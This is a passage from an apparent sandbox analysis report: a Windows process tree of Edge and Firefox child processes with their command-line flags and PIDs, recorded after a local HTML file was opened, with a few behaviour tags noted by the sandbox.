  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=8976 /prefetch:2
  2⤵
  PID:1256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10412 /prefetch:1
  2⤵
  PID:6184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9520 /prefetch:1
  2⤵
  PID:6824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10796 /prefetch:1
  2⤵
  PID:6964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10496 /prefetch:1
  2⤵
  PID:2760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11120 /prefetch:1
  2⤵
  PID:1896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11152 /prefetch:1
  2⤵
  PID:3836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10332 /prefetch:1
  2⤵
  PID:4852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10368 /prefetch:1
  2⤵
  PID:5964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,7985836848572269383,7298969929170953667,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8312 /prefetch:1
  2⤵
  PID:5240

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5244

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4704

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:5552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\ResizeGet.html
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffdd6ed46f8,0x7ffdd6ed4708,0x7ffdd6ed4718
  2⤵
  PID:3240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
  2⤵
  PID:4620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 /prefetch:3
  2⤵
  PID:1684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
  2⤵
  PID:4792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:5232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:6800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1
  2⤵
  PID:5244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
  2⤵
  PID:4672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
  2⤵
  PID:6736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
  2⤵
  PID:2396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4212 /prefetch:1
  2⤵
  PID:2684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
  2⤵
  PID:5780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3068 /prefetch:1
  2⤵
  PID:2088
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:8
  2⤵
  PID:2324
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:8
  2⤵
  PID:6888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
  2⤵
  PID:3504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
  2⤵
  PID:3412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
  2⤵
  PID:3660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1
  2⤵
  PID:3632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
  2⤵
  PID:4684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
  2⤵
  PID:6412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6308 /prefetch:8
  2⤵
  PID:2908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
  2⤵
  PID:1412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6492 /prefetch:1
  2⤵
  PID:6928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:1
  2⤵
  PID:6284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:1
  2⤵
  PID:6948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5384 /prefetch:2
  2⤵
  PID:6844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6756 /prefetch:1
  2⤵
  PID:3388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6672 /prefetch:8
  2⤵
  PID:7108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3280 /prefetch:8
  2⤵
  PID:7068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6924 /prefetch:8
  2⤵
  PID:1020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1
  2⤵
  PID:6008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3964 /prefetch:8
  2⤵
  PID:5472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2152,6725808345846405323,7684200729482522926,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6088 /prefetch:8
  2⤵
  PID:5992

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5444

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2776

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5936

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5956
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:6256
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1956 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 23681 -prefMapSize 244705 -appDir "C:\Program Files\Mozilla Firefox\browser" - {be1fb95a-b8b5-4aa7-8063-29d4affe834b} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" gpu
    3⤵
    PID:4600
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2364 -parentBuildID 20240401114208 -prefsHandle 2356 -prefMapHandle 2352 -prefsLen 23717 -prefMapSize 244705 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f493d37-00e9-4266-95b5-b7fc3348c352} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" socket
    3⤵
    - Checks processor information in registry
    PID:6432
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3304 -childID 1 -isForBrowser -prefsHandle 3040 -prefMapHandle 3160 -prefsLen 23858 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d001909e-d840-43cb-b340-4d5f38aada07} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
    3⤵
    PID:1312
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4220 -childID 2 -isForBrowser -prefsHandle 4212 -prefMapHandle 2664 -prefsLen 29091 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2e4f0e5-67b8-416b-962c-37d749ad1572} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
    3⤵
    PID:1404
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4640 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4808 -prefMapHandle 4804 -prefsLen 29198 -prefMapSize 244705 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a226775-ec1d-4c44-9d82-aa3e2d3fa8a7} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" utility
    3⤵
    - Checks processor information in registry
    PID:1748
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5108 -childID 3 -isForBrowser -prefsHandle 5168 -prefMapHandle 5164 -prefsLen 27051 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb85a128-4b62-4e57-8f6f-2511ade2f1e9} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
    3⤵
    PID:7056
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5300 -childID 4 -isForBrowser -prefsHandle 5308 -prefMapHandle 5312 -prefsLen 27051 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f85381f-0a44-4d99-96a4-5529f09fc3eb} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
    3⤵
    PID:3876
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5504 -childID 5 -isForBrowser -prefsHandle 5584 -prefMapHandle 5580 -prefsLen 27051 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77d0d59f-85b3-4587-a5cf-6d11521d6be2} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
    3⤵
    PID:6352
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5336 -childID 6 -isForBrowser -prefsHandle 5344 -prefMapHandle 5348 -prefsLen 27051 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3bcca88-6e90-4168-b4ff-186017a7b7e6} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
    3⤵
    PID:3224
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4728 -childID 7 -isForBrowser -prefsHandle 4344 -prefMapHandle 4656 -prefsLen 27838 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {918ba5f5-4b91-4d7b-aec5-179f4ce45c1b} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
    3⤵
    PID:6172
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1492 -childID 8 -isForBrowser -prefsHandle 4608 -prefMapHandle 3088 -prefsLen 27878 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6cca616-b67b-4cb3-996e-0a74667da3a3} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
    3⤵
    PID:6316
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5704 -childID 9 -isForBrowser -prefsHandle 5624 -prefMapHandle 5636 -prefsLen 27878 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ecd0fff-7df6-4a12-ab9a-e281c5b6c93f} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
    3⤵
    PID:5748
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5672 -childID 10 -isForBrowser -prefsHandle 6836 -prefMapHandle 6832 -prefsLen 27878 -prefMapSize 244705 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ce9bb3c-5707-4de5-843d-4f1bdee16451} 6256 "\\.\pipe\gecko-crash-server-pipe.6256" tab
    3⤵
    PID:1276
- - C:\Program Files\Mozilla Firefox\firefox.exe
